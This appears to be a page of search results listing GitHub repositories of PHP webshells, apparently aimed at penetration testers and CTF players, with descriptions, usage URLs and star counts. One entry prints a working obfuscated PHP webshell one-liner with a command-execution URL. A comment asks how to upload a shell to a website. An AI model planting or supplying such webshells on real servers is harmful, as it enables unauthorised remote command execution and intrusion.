🌐
GitHub
gist.github.com › joswr1ght › 22f40787de19d80d110b37fb79ac3985
easy-simple-php-webshell.php · GitHub
Could you please let me know how to upload the webshell file on website? Hey, we need some deep knowledge for what you want to know, I can't write everything here, but Study about file upload vulnerability, tons of resources there. You can check this also .. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload Insecure Files/README.md#upload-tricks · Copy link · Copy Markdown · thank you bro! i was trying www's php webshell and i cant get it to work ·
🌐
GitHub
github.com › JohnTroony › php-webshells
GitHub - JohnTroony/php-webshells: Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server! · GitHub
I'll keep updating the collection whnever I stumble on any new webshell. ... @software{jacques_pharand_2020_3748072, author = {Jacques Pharand and John Troon and Javier Izquierdo Vera}, title = {JohnTroony/php-webshells: Collection CS1}, month = apr, year = 2020, publisher = {Zenodo}, version = {1.1}, doi = {10.5281/zenodo.3748072}, url = {https://doi.org/10.5281/zenodo.3748072} }
Starred by 1.9K users
Forked by 769 users
Languages   PHP 98.9% | Perl 1.1%
🌐
GitHub
github.com › drag0s › php-webshell
GitHub - drag0s/php-webshell: A very simple but functional PHP webshell. · GitHub
A very simple but functional PHP webshell. Contribute to drag0s/php-webshell development by creating an account on GitHub.
Starred by 33 users
Forked by 29 users
Languages   PHP
🌐
GitHub
github.com › WhiteWinterWolf › wwwolf-php-webshell
GitHub - WhiteWinterWolf/wwwolf-php-webshell: WhiteWinterWolf's PHP web shell · GitHub
WhiteWinterWolf's PHP web shell. Contribute to WhiteWinterWolf/wwwolf-php-webshell development by creating an account on GitHub.
Starred by 764 users
Forked by 168 users
Languages   PHP 65.2% | Shell 34.8%
🌐
GitHub
github.com › b374k › b374k
GitHub - b374k/b374k: PHP Webshell with handy features · GitHub
$ php -f index.php b374k shell packer 0.4 options : -o filename save as filename -p password protect with password -t theme theme to use -m modules modules to pack separated by comma -s strip comments and whitespaces -b encode with base64 -z [no|gzdeflate|gzencode|gzcompress] compression (use only with -b) -c [0-9] level of compression -l list available modules -k list available themes
Starred by 2.6K users
Forked by 760 users
Languages   CSS 46.3% | PHP 39.2% | JavaScript 14.5%
🌐
GitHub
github.com › artyuum › simple-php-web-shell
GitHub - artyuum/simple-php-web-shell: Tiny PHP Web shell for executing unix commands from web page · GitHub
Tiny PHP Web shell for executing unix commands from web page - artyuum/simple-php-web-shell
Starred by 309 users
Forked by 146 users
Languages   PHP
🌐
GitHub
github.com › Caesarovich › rome-webshell
GitHub - Caesarovich/rome-webshell: A powerful and delightful PHP WebShell · GitHub
This is a lightweight PHP webshell, using only vanilla JavaScript and CSS, no jQuery/Bootstrap bloat.
Starred by 68 users
Forked by 10 users
Languages   PHP
🌐
GitHub
github.com › bayufedra › Tiny-PHP-Webshell
GitHub - bayufedra/Tiny-PHP-Webshell: several list of simple and obfuscate PHP shell · GitHub
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?> [*] Usage: http://target.com/path/to/shell.php?_=function&__=argument [*] E.g.: http://target.com/path/to/shell.php?_=system&__=ls
Starred by 196 users
Forked by 40 users
🌐
GitHub
github.com › d4rkiZ › ProcOpen-PHP-Webshell
GitHub - d4rkiZ/ProcOpen-PHP-Webshell: Experience the power of a PHP webshell designed to overcome the limitations of blacklisted system/exec functions. · GitHub
Access the webshell via a web browser, using the following URL: https://<server_address>/Proc-PHP-Webshell.php?cmd=
Starred by 26 users
Forked by 6 users
Languages   PHP
🌐
GitHub
github.com › topics › php-webshell
php-webshell · GitHub Topics · GitHub
php command-line hacking web-security command-line-tool bypass hacktoberfest webshell php-backdoor webshells php-webshell tiny-shell mini-shell penetration-testing-tools pantest pantesting bypass-webshell webshell-bypass-403 1kb-webshell bypass-disable-function ... A collection of advanced PHP and ASPX web shells designed to bypass security measures.
Find elsewhere
🌐
GitHub
gist.github.com › taeguk › d5d9e4a10dfb4295e00b
Simple PHP Webshell · GitHub
Simple PHP Webshell · Raw · webshell.php · This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters ·
🌐
GitHub
github.com › topics › c99-shell-php
c99-shell-php · GitHub Topics · GitHub
October 6, 2025 - web-shell hacking-tools php-shell file-manager-shell c99-shell-github c99-shell-php c99-shell-latest-version rootshell-c99 c99-shell-commands c99-shell c99-web-shell c99shell-download
🌐
GitHub
gist.github.com › mrpapercut › 9e4f511e74fdf3796d0abcc4de182b65
Interactive PHP webshell · GitHub
Interactive PHP webshell · Raw · shell.php · This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters ·
🌐
GitHub
github.com › tennc › webshell › blob › master › php › aioshell.php
webshell/php/aioshell.php at master · tennc/webshell
<td><a href="webshell.php?cmd=... </html>'; } } function aio_main() { $uid = posix_getuid(); $user_info = posix_getpwuid($uid); $uid_banner="uid=".$uid."(".$user_info['name'].") "....
Author   tennc
🌐
GitHub
github.com › k4mpr3t › b4tm4n
GitHub - k4mpr3t/b4tm4n: B4TM4N ~ PHP WEBSHELL · GitHub
Usage : http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php
Starred by 189 users
Forked by 90 users
Languages   PHP
🌐
GitHub
github.com › WhiteWinterWolf › wwwolf-php-webshell › blob › master › webshell.php
wwwolf-php-webshell/webshell.php at master · WhiteWinterWolf/wwwolf-php-webshell
$passprompt = "WhiteWinterWolf's PHP webshell: "; $passhash = ""; · function e($s) { echo htmlspecialchars($s, ENT_QUOTES); } · function h($s) { global $passprompt; if (function_exists('hash_hmac')) { return hash_hmac('sha256', $s, ...
Author   WhiteWinterWolf
🌐
GitHub
github.com › topics › php-webshells
php-webshells · GitHub Topics · GitHub
php wordpress wordpress-plugin backdoor php-webshells trojan-malware php-webshell php-webshell-backdoor trojan-horse
🌐
GitHub
github.com › flozz › p0wny-shell
GitHub - flozz/p0wny-shell: Single-file PHP shell · GitHub
docker build -t p0wny . docker run -it -p 8080:8080 -d p0wny # open with your browser http://127.0.0.1:8080/shell.php
Starred by 2.8K users
Forked by 687 users
Languages   PHP 99.4% | Dockerfile 0.6%
🌐
GitHub
github.com › abunazir › php-web-shell
GitHub - abunazir/php-web-shell
This is a small and simple PHP-shell that has an explorer, allows shell command execution, mysql queries, and more.
Starred by 8 users
Forked by 12 users
Languages   PHP 100.0% | PHP 100.0%
🌐
GitHub
github.com › topics › php-shell
php-shell · GitHub Topics · GitHub
Discover Yavuzlar WebShell, a powerful web-based shell tool for file management, terminal access, and reverse shell operations. Learn how it enhances remote administration and cybersecurity simulations. terminal reverse-shell cybersecurity file-manager php-shell remote-administration web-based-shell yavuzlar-webshell